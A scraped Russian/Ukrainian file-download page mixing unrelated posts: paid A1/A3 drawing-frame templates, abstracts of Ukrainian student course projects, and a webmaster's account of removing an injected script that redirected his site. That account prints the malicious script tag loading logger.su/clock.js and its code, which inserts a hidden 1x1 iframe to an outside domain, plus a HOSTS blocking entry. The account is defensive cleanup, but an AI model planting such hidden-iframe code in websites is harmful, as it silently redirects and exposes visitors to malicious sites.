Рамки горизонтальные, вертикальные А1 и А3 в Corel Draw, Splan, MS Visio (ЕСКД)

Горизонтальные и вертикальные рамки формата А1 и А3 для оформления чертежей в

Corel Draw, Splan, MS Visio.

Ramka-B.doc Ramka-M.doc

  A3 горизонтальная (unknown, 2,613 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  А1 горизонтальная (unknown, 1,909 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  А1 вертикальная (unknown, 1,290 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  А3 вертикальная (unknown, 1,061 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  А1 горизонтальная spl (unknown, 995 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  A1 для MS Visio (unknown, 1,475 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

Оплата чисто символическая.
Оплату можно провести через Яндекс. Деньги, для платежей из кошелька

или картой Visa и MasterCard,  для платежей с карт Visa и MasterCard

После оплаты на Вашу электронную почту будет выслан архив с Набором рамок Формата А1, А3 Corel Draw, Splan, MS Visio

Вредоносная ссылка в теле сайта

Вкратце опишу ситуацию. Ни с того, ни с сего, мой сайт начал при запуске переадресовываться на другой сайт “http://talmeris.com/”. Я к googlу и yandexу за помощью, ничего толкового не нашел в чем причина, техподдержка послала по дальше, мол это ваши проблемы. Помощи ждать не от кого. Но все же направление где копать появилось. Вредоносный скрипт в теле сайта. Где искать? И что с ним делать. Идея первая, изменить файл HOST.

# This HOSTS file created by Dr.Web Scanner for Windows

127.0.0.1 localhost

127.0.0.1 www.searchmagnified.com

127.0.0.1 searchmagnified.com

# ::1 localhost

Помогло. Стала грузиться страница. Но проблема осталась. Не буду же я рассылать своим пользователям инструкцию по запуску моего сайта))).

Идея вторая, найти и обезвредить вредителя. Поиск по каталогам сайт ни чего не дал. Но натолкнул на —- Iframe – “плавающий” или встроенный фрейм с помощью которого можно вставить один html(php)-документ в другой html(php)-документ.

Например:
<iframe src=”iframe.html” name=”iframe” width=”0″ height=”0″ scrolling=”auto”> </iframe>

А нули это очень плохо, объясню почему, вставка есть, а мы ее не видим. Поиск <iframe src> на сайте ни к чему не привел.

Ну все таки я его родименького нашел, вот он:

<br>Время по серверу: <script language=”JavaScript” src=”http://logger.su/clock.js”></script>

А вот его код:

var iframe_0 = document.createElement(‘iframe’);
iframe_0.width = 1;
iframe_0.src = “http://talmeris.com/123/index.php”;
iframe_0.style.visibility = “hidden”;
iframe_0.height = 1;
document.body.appendChild( iframe_0 );

Теперь осталось подредактировать код и запустить сайт. Все заработало как прежде.

Механічне устаткування конвертерного цеху з реконструкцією приводу механізму повороту конвертора

Реконструкція приводу механізму повороту конвертора

Розрахунково-пояснювальна записка

Об’єкт проектування – механічне устаткування конвертерного цеху з реконструкцією приводу механізму повороту конвертора.

У загальній частині приведений технологічний процес виробництва сталі, описано основне технологічне устаткування, що забезпечує реалізацію прийнятого технологічного процесу.

У спеціальній частині розглянуті конструктивні особливості приводу механізму повороту конвертора. Виконаний розрахунок потужності двигуна механізму повороту з урахуванням маси конвертора з футеровкою, маси сталі, сил тертя в опорах конвертора, динамічних навантажень, що виникають в перехідні періоди роботи приводу. Виконаний аналіз завантаженості опори шестерні навісного редуктора. Розроблені заходи щодо зниження динамічних навантажень, що діють на вузол приводу.

У економічній частині виконаний аналіз організаційно-технічного рівня ремонтного господарства і розрахунок економічної ефективності впроваджувальних заходів.

У організаційній частині розроблені питання раціональної організації ремонтів устаткування цеху.

У технологічній частині проекту розроблені питання монтажу конвертора.

У розділі «охорона праці» розроблений інженерно-технологічні заходи щодо поліпшення умов праці, пожежної безпеки і охорони навколишнього середовища.

Проект виконаний з тематики затвердженою кафедрою МОМЗ ДГТУ.

КОМБІНАТ, ЦЕХ, КОНВЕРТОРНИЙ, ПРОЦЕС ТЕХНОЛОГІЧНИЙ, УСТАТКУВАННЯ, ПРИВІД, КОНВЕРТОР, МОМЕНТ, ПОТУЖНІСТЬ, РОЗРАХУНОК, АНАЛІЗ, ЕФЕКТ, РЕМОНТ, МОНТАЖ, ОХОРОНА ПРАЦІ

  Зміст (unknown, 467 hits)

Гідрогеологічні дослідження для обґрунтування проекту з осушення рудних пісків дмитрівської ділянки Малишевського розсипного циркон – рутил – ільменитового родовища Дніпропетровської області

                                                 Реферат

Тема: «Гідрогеологічні дослідження для обґрунтування проекту з осушення рудних пісків дмитрівської ділянки Малишевського розсипного циркон – рутил – ільменитового родовища Дніпропетровської області»
Мета: для обґрунтування проекту з осушення рудних пісків дмитрівської ділянки Малишевського розсипного циркон – рутил – ільменитового родовища Дніпропетровської області нам необхідно виконати гідрогеологічні дослідження ділянки робіт,отримати уміння прогнозувати зміни навколишнього середовища з метою його захисту, а також знати правила техніки безпеки при виконанні робіт.
В адміністративному відношенні ділянка робіт розташована в південно – західній частині Верхньодніпровського району Дніпропетровської області. Загальна площа досліджуваної ділянки складає 266,8га.
Курсовий проект складається з двох частин: першої загальної до складу якої входять такі умови; фізико – голографічні умови району та ділянки робіт, місце знаходження і економіка району та ділянки робіт, орогідрографія району та ділянки робіт, клімат району та ділянки робіт, геологічна будова району та ділянки робіт, гідрогеологічні умови району та ділянки робіт, аналіз раніш проведених робіт. Та другої проектної частини до якої входять: обґрунтування видів та об’ємів запроектованих робіт, методика та техніка виконання запроектованих робіт, гідрогеологічні розрахунки, охорона навколишнього середовища та раціональне використання природних ресурсів, техніка безпеки, заходи по енергозбереженню при виконанні дослідних гідрогеологічних робіт, цивільна оборона.

  Гідрогеологічні дослідження (unknown, 1 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

Ітераційні методи розрахунку систем керування

Ітераційні методи розрахунку параметрів комп’ютеризованих систем керування

Пояснювальна записка містить 32 стор., 3 рис., 9 джерел.

Розробка програми регулюючого впливу, що розраховується комп’ютерною системою керування у середовищі С++Builder.

Методи реалізації: аналіз літературних джерел, розробка програмного забезпечення за допомогою ПК; аналіз працездатності розробленого програмного забезпечення.

Ідея роботи складається в розробці програмного забезпечення для системи керування технологічного процесу, що дозволяє розрахувати керуючий вплив згідно заданої функціональної залежності.

Ключові слова: ОПЕРАЦІЙНА СИСТЕМА WINDOWS, C++BUILDER, BUTTON, WHILE, DO…WHILE, OBJECT INSPECTOR, КОМПІЛЯЦІЯ, LABEL.

  Курсовий з системного програмування (unknown, 5 hits)
Зарегистрируйтесь, чтобы скачать этот файл.

  Програма (unknown, 4 hits)
Зарегистрируйтесь, чтобы скачать этот файл.